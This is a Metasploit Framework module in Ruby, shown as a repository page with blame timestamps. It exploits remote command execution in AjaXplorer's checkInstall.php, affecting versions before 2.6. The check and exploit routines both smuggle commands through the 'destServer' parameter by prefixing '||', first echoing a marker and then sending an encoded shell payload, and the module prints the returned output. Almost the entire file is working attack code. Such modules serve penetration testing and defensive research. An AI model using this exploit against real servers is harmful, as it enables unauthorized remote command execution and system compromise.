metasploit-framework/modules/exploits/multi/http/ajaxplorer_checkinstall_exe...

111 lines
3.1 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
2.6 are vulnerable.
},
'Author' =>
[
'Julien Cayssol', #Credited according to SecurityFocus
'David Maciejak', #Metasploit module
'sinn3r' #Final touch on the Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '63552' ],
[ 'BID', '39334' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
}
},
'Platform' => %w{ bsd linux osx unix win },
2013-08-30 21:28:54 +00:00
'Arch' => ARCH_CMD,
'Targets' => [[ 'AjaXplorer 2.5.5 or older', { }]],
'DisclosureDate' => 'Apr 4 2010',
'DefaultTarget' => 0))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
], self.class)
end
2013-08-30 21:28:54 +00:00
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
2013-08-30 21:28:54 +00:00
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
'vars_get' => {
'destServer' => "||echo #{clue}"
}
})
2013-08-30 21:28:54 +00:00
# If the server doesn't return the default redirection, probably something is wrong
if res and res.code == 200 and res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
2013-08-30 21:28:54 +00:00
return Exploit::CheckCode::Safe
end
2013-08-30 21:28:54 +00:00
def exploit
peer = "#{rhost}:#{rport}"
uri = target_uri.path
2013-08-30 21:28:54 +00:00
# Trigger the command execution bug
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
'vars_get' =>
{
'destServer' => "||#{payload.encoded}"
}
})
2013-08-30 21:28:54 +00:00
if res
print_status("#{peer} - The server returned: #{res.code} #{res.message}")
m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
2013-08-30 21:28:54 +00:00
if m.empty?
print_error("#{peer} - This server may not be vulnerable")
else
print_status("#{peer} - Command output from the server:")
print_line(m)
end
end
end
end
=begin
Repo:
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
=end